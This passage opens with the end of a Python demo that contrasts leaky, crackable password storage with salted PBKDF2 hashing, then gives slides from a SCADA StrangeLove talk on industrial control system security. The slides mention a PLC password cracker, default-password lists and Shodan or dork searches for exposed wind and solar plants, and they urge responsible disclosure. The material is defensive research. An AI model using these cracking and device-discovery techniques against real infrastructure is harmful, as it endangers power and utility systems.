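    return None


def store_hardened(password: str, iterations: int = 100_000) -> dict:
    """Per-record random salt, slow KDF, and nothing that reveals the length."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": dk.hex()}


def verify_hardened(record: dict, password: str) -> bool:
    """Constant-time comparison of the recomputed key against the stored one."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk, bytes.fromhex(record["hash"]))


if __name__ == "__main__":
    rec = store_weak("7t4")
    print("leaked length:", leaked_length(rec), "-> cracked:", crack_weak(rec))
    print("search space without leak:", search_space(36, 8),
          "with leak:", search_space(36, 8, leaked_length(rec)))
```

The salt is what stops one precomputed table from covering every device; the iteration count is what makes each guess cost something; and the absence of a length field means the attacker has to try every length again.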
  • 53. “Securely” setting the speed of a power turbine. More details in the talk “SCADA deep inside: protocols and security mechanisms”
  • 54. Industrial protocols: S7-300 PLC password cracker, included in the popular tool thc-hydra.
  • 55.
  • 56.
  • 57.
  • 60.  We follow the responsible disclosure approach  Full disclosure = all vulnerability details go into the wild immediately, giving the vendor no opportunity to release a fix  Responsible disclosure = the researcher contacts the vendor before the vulnerability is released, and all stakeholders agree on a period of time for the vulnerability to be patched before the details are published  Patching is very important for ICS and can take months. Even years.
  • 61.  That’s why responsible disclosure is highly important in ICS
  • 62. 1. Research 2. We send the details directly to the vendor and CERT 3. The vendor creates a CVE 4. The vulnerability is patched 5. SCADASL public disclosure and exploit/toolkit publication 6. Applause for SCADASL 7. Research 8. …
  • 63. Analytics every year:  ICSMAP  ICSDORKS
  • 64.  #SCADAPASS • Release 1.2 • 37 vendors • PLC, RTU, gateways, switches, servers …
  • 65.  #SCADASOS (un)Secure Open SmartGrids is an open initiative to raise awareness of the insecurity of SmartGrids, photovoltaic power stations and wind farms
  • 66. Q: How do I participate?
    A: Find Internet-connected PV and wind power stations and notify vendors/CERTs/community.
    Q: Wow! It’s simple! Can I hack it?
    A: No. It can be a hospital or your grandma’s cottage. Please use a passive approach (firmware analysis, testbeds etc.)
    Q: I got a 0day!
    A: Please submit it to the vendor and/or regional CERT.
    Q: What will I get?
    A: Kudos at SCADA StrangeLove talks / knowledge / a safer world.
    Details: you can make a Shodan saved search or drop Google dorks on Twitter. Please use the tags #solar #wind #scadasos
  • 67.  60 000+ SmartGrid devices disconnected from the Internet  Two Advisories • XZERES 442SR Wind Turbine CSRF • SMA Solar Technology AG Sunny WebBox Hard-Coded Account Vulnerability
  • 68. Current and future:  Smart energy generation  Railroad and signalling systems  Digital substations  GSM/GPRS modems
  • 69.  The well-known, familiar world of information security is growing up, evolving and changing quickly  Because a lot of specialists are involved in it  Unfortunately the ICS security area is not very mobile or changeable  Also, our team members are growing old and starting families  We think our mission has been accomplished
  • 70.  But not finished yet….
  • 71. Still trying to hack ICS, son? Have you ever heard about SCADASTRANGELOVE ?!
  • 72.  All materials at SCADA.SL  We hope that our work can help you create your own projects. But don’t forget about the community and the responsible disclosure principle
  • 73. *All pictures are taken from Google and other Internets. Alexander Timorin Alexander Tlyapov Alexander Zaitsev Alexey Osipov Andrey Medov Artem Chaykin Denis Baranov Dmitry Efanov Dmitry Nagibin Dmitry Serebryannikov Dmitry Sklyarov Evgeny Ermakov Gleb Gritsai Ilya Karpov Ivan Poliyanchuk Kirill Nesterov Roman Ilin Sergey Bobrov Sergey Drozdov Sergey Gordeychik Sergey Scherbel Timur Yunusov Valentin Shilnenkov Vladimir Kochetkov Vyacheslav Egoshin Yuri Goltsev Yuriy Dyachenko

Editor's Notes

  1. For example, a DS in your window is an easy target for an evil guy. But the good news, and the only one: he is not economically motivated to do this. No profit! He prefers to hack banks and so on
  2. JUST A BSOD_JOKE!